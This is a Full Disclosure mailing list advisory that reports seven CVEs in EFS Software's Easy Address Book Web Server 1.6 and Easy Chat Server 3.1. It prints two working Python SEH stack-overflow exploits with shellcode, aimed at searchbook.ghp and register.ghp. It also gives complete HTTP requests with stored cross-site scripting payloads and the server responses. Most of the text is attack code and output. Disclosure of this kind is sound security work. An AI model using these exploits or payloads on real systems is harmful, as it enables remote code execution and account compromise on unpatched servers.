Full Disclosure mailing list archives
[CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497] Multiple vulnerabilities in EFS Software products
From: Rafael Pedrero <rafael.pedrero () gmail com>
Date: Wed, 30 Aug 2023 12:42:43 +0200
# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-01-10 # CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493 # Vendor Homepage: http://www.efssoft.com/web-address-book-server.html # Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9) # Tested Version: 1.6 # Tested on: Windows 7, 10 # CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-119 Vulnerability description: There is a remote stack-based buffer overflow (SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6. By sending an overly long username string to /searchbook.ghp for asking the name via POST, an attacker may be able to execute arbitrary code. Proof of concept: import socket import struct def sendbuff(): # > arwin.exe kernel32.dll WinExec # WinExec is located at 0x776f2c91 in kernel32.dll shellcode_WinExec = ( "\x33\xc0" # XOR EAX,EAX "\x50" # PUSH EAX => padding for lpCmdLine "\x68\x2E\x65\x78\x65" # PUSH ".exe" "\x68\x63\x61\x6C\x63" # PUSH "calc" "\x8B\xC4" # MOV EAX,ESP "\x6A\x01" # PUSH 1 "\x50" # PUSH EAX "\xBB\x91\x2c\x6f\x77" # MOV EBX,kernel32.WinExec "\xFF\xD3") # CALL EBX shellcode_system = ( "\x31\xC9" # xor ecx,ecx "\x51" # push ecx "\x68\x63\x61\x6C\x63" # push 0x636c6163 "\x54" # push dword ptr esp "\xB8\x6f\xb1\xdc\x75" # mov eax,msvcrt.system "\xFF\xD0") # call eax shellcode = shellcode_WinExec # SEH junk1 = "A"*455 buffer = junk1 buffer += "\xeb\x10\x90\x90" # jmp 0x10 to nops to shellcode buffer += struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071e SSLEAY32.DLL from !Mona 0x1001071e buffer += "\x90" * 20 buffer += shellcode junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20) buffer += junk2 return buffer def REQ_POST (padding): POST = ( "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n" "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: " + str(108 + len(padding))+ "\r\n" "Connection: keep-alive\r\n" "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n" "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n" "Upgrade-Insecure-Requests: 1\r\n" "Host: "+str(ip)+"\r\n\r\n" "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding + "&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n" ) return POST ip = '192.168.X.X' port = 80 payload = sendbuff() try: print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book Web Server V1.6, length " + str(len(payload)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(REQ_POST(payload)) s.recv(1024) s.close() print "\n[*] Sended POST length " + str(len(payload)) except: print "Connecting error" # CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Address Book Web Server v1.6, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POST method), in multiple parameters. Proof of concept: POST http://localhost/addrbook.ghp?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 475 Origin: http://localhost Connection: keep-alive Referer: http://localhost/editcontact.ghp?id=1&cid=12 Cookie: SESSIONID=15337; UserID=; PassWD= Upgrade-Insecure-Requests: 1 Host: localhost addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1% 40demo1.com &company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=¬es=demo1&save=Save Vulnerable parameters: firstname, homephone, lastname, middlename, workaddress, workcity, workcountry, workphone, workstate, workzip Response: <TR> <TD class=row2><SPAN class=genmed><A target=_blank class=genmed href="viewcontact.ghp?id=1&cid=12">demo1 </a><script>alert(1);</script><a> demo1</A></SPAN></TD> <TD class=row2 align=left><SPAN class=genmed><a href="mailto: demo1 () demo1 com">demo1 () demo1 com</a></SPAN></TD> <TD class=row2 align=left><SPAN class=genmed></SPAN></TD> <TD class=row2 align=left><SPAN class=genmed></SPAN></TD> <TD class=row2 align=left><SPAN class=genmed>demo1, , , , USA</SPAN></TD> <TD class=row2 align=left><SPAN class=genmed><a href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD> <TD class=row2 align=left><SPAN class=genmed><a href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1 </a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD> # CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Address Book Web Server v1.6, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST method, authenticated Admin user), in multiple parameters. Proof of concept: Example 1: POST http://localhost/users_admin.ghp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 134 Origin: http://localhost Connection: keep-alive Referer: http://localhost/users_admin.ghp Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted> Upgrade-Insecure-Requests: 1 Host: localhost userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update Vulnerable parameter: email Response: <form method="POST" action=""> <TR> <input type="hidden" name="userid" value="2"> <TD class=row2 align=left><input type="text" name="username" size="15" value="test"> </TD> <TD class=row2 align=left><input type="text" name="password" size="15" value=""> </TD> <TD class=row2 align=left><input type="text" name="email" size="35" value=""><script>alert(1);</script>"> </TD> <TD class=row2 align=left><select name="level"><option
guest</option><option selected>user</option><option >power
user</option></select></TD> <TD class=row2 align=left><select name="state"><option selected>Enable</option><option >Disable</option></select></TD> <TD class=row2 align=left><input type="submit" value="Update" name="update_user"></TD> <TD class=row2><SPAN class=genmed><A class=genmed href="user_delete_admin.ghp?2">Delete</A></SPAN></TD> </TR> </form> Example 2: POST http://localhost/users_admin.ghp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 144 Origin: http://localhost Connection: keep-alive Referer: http://localhost/users_admin.ghp Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted> Upgrade-Insecure-Requests: 1 Host: localhost userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt% 40fsdfs.com&level=user&state=Enable&update_user=Update Vulnerable parameter: username Response: <form method="POST" action=""> <TR> <input type="hidden" name="userid" value="2"> <TD class=row2 align=left><input type="text" name="username" size="15" value=""><script>alert(1);</script>"> </TD> <TD class=row2 align=left><input type="text" name="password" size="15" value=""> </TD> <TD class=row2 align=left><input type="text" name="email" size="35" value=" tt () fsdfs com"> </TD> <TD class=row2 align=left><select name="level"><option
guest</option><option selected>user</option><option >power
user</option></select></TD> <TD class=row2 align=left><select name="state"><option selected>Enable</option><option >Disable</option></select></TD> <TD class=row2 align=left><input type="submit" value="Update" name="update_user"></TD> <TD class=row2><SPAN class=genmed><A class=genmed href="user_delete_admin.ghp?2">Delete</A></SPAN></TD> </TR> </form> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-01-09 # CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497 # Vendor Homepage: http://www.echatserver.com/ # Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b) # Tested Version: 3.1 # Tested on: Windows 7, 10 # CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-119 Vulnerability description: There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long username string to register.ghp for asking the username via GET, an attacker may be able to execute arbitrary code. Proof of concept: import socket def sendbuff(): # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + "\x1c\x39\xbd" ) # SEH junk1 = "A"*473 buffer = junk1 buffer += "\xeb\x06\x90\x90" # short jmp to shellcode buffer += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL from !Mona buffer += shellcode junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4) buffer += junk2 return buffer def REQ_GET (padding): GET = ( "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n" "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n" "Host: "+str(ip)+":80\r\n" "Accept-Language: es-es\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://"+str(ip)+"\r\n" "Connection: Keep-Alive\r\n\r\n" ) return GET ip = '192.168.X.X' # change the ip address port = 80 payload = sendbuff() try: print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(REQ_GET(payload)) s.recv(1024) s.close() print "\n[*] Sended GET length " + str(len(payload)) except: print "Connection error" # CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Chat Server v3.1, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /registresult.htm (POST method), in Resume parameter. The XSS is loaded from /register.ghp. Proof of concept: POST http://localhost/registresult.htm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 257 Origin: http://localhost Connection: keep-alive Referer: http://localhost/register.ghp?username= <redacted>&password=<redacted> Upgrade-Insecure-Requests: 1 Host: localhost UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1% 25252540demo1.com &Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change Response <BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been changed successfully.</center></body> Go to: http://localhost/register.ghp?username=<redacted>&password=<redacted> Response - xss: <TR><TD> Your profile/interests:<BR> <TEXTAREA rows="4" cols="30" name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA> <INPUT type="hidden" name="cw" value="0"> <INPUT type="hidden" name="RoomID" value="<!--$RoomID-->"> <INPUT type="hidden" name="RepUserName" value="<!--$UserName-->"> </TD></TR> # CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Chat Server v3.1, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter. Proof of concept: POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 248 Origin: http://localhost Connection: keep-alive Referer: http://localhost/chatsubmit.ghp?username= <redacted>&password=<redacted>&room=4 Upgrade-Insecure-Requests: 1 Host: localhost staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on¬ifysound=on&message=demo+&chat_flag= Response: <html> <head> </head> <body> <script language="JavaScript"> <!-- parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font color=green size=2>08:22:16 <a target=chatsubmit href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> => <a target=chatsubmit href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a> </font><font color=#000000 size=2>demo </font> <img src=/face/100.gif border=0>"; // --> </script> </body> </html> # CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Chat Server v3.1, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /registresult.htm (POST method), in Icon parameter. The XSS is loaded from /users.ghp. Proof of concept: POST /registresult.htm HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 235 Origin: http://localhost Connection: close Referer: http://localhost/register.ghp?username= <redacted>&password=<redacted> Upgrade-Insecure-Requests: 1 UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change Response: <BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been changed successfully.</center></body> When user information page load: http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4 <font color="red">[vip room]</font> <br><br> [Online users:1]<br><br>[<a href="javascript:parent.chatsubmit.getname('All');" target="chatsubmit">All</a>] <br><br> <script> if(navigator.appName!="Netscape" && parent.chatsubmit.document && parent.chatsubmit.document.readyState == "complete") parent.chatsubmit.listcolorchange(); </script> <img src="/images/""><script>alert(111)</script><i>[<a href="javascript:parent.chatsubmit.getname('<redacted>');" target="chatsubmit"><redacted></a>]<==<br> <br> <br><br> [<a href="javascript:OnRegister();">Change infomation</a>] </i> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- [CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497] Multiple vulnerabilities in EFS Software products Rafael Pedrero (Aug 31)